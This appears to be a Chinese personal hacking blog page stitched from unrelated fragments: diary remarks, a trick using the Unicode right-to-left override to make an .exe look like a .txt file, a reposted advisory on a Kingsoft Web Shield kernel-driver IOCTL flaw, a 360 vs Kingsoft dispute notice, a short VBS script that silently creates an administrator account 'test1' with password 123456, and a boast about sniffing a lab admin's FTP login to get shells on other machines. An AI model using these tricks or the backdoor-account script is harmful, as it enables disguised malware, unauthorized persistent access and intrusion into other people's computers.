工作上有了很大的进展！晚上去吃了小龙虾哈哈果然不错。顺便去电影院看了看波斯王子。一个粽子也没吃 遗憾了。

对准一个exe-右键重命名-选插入unicode字符-rlo，然后改名成exe.txt，这个txt后缀一样执行exe

其实还是exe

受影响系统：

Kingsoft Corp Web Shield <= 3.5.1.2

描述：

金山网盾是一款非常流行的免费浏览器安全防护软件。

金山网盾所使用的Kavsafe.sys内核驱动创建名为\Device\KAVSafe的设备并处理DeviceIoControl请求IoControlCode = 0x830020d4，这允许本地用户通过提交恶意IOCTL请求覆盖任意内核模块数据，导致执行任意内核态代码。

<*来源：Xuanyuan Smart
  
  链接：http://www.exploit-db.com/exploits/12710
*>

测试方法：

» 阅读全文

金山网盾存在恶意干扰360安全卫士网页防火墙运行等多项问题，导致电脑防护出现漏洞，面临木马盗号偷隐私的威胁。与金山公司多次沟通后无果。360安全中心决定放弃与金山网盾兼容共存的努力。具体说明请见：

http://bbs.360.cn/4037881/37115176.html?recommend=1

铁证如山：金山网盾如何破坏360安全卫士的防护能力（请用IE浏览器测试。为防止测试用户电脑中招，测试链接以钓鱼诈骗网站为主）
http://bbs.360.cn/3229787/37135842.html

I LIKE !

比较经典！

运行后自动添加 用户dadan密码为123456

无窗口。不过在已经存在用户的情况下WINDOWS会提示用户已存在！

用VBS那个添加用户的脚本改的 方便使用而已！

衣冠禽兽，偷拍都敢开闪光灯。 

                ....................

» 阅读全文

Set  o=CreateObject( "Shell.Users" )
Set z=o.create("test1")
z.changePassword "123456",""
z.setting("AccountType")=3

websniff 貌似很多人忘记了。我以前确实没成功过，这次意外嗅到机房的管理员的机器上开的FTP才顺利拿到其他机器的shell。确实意外。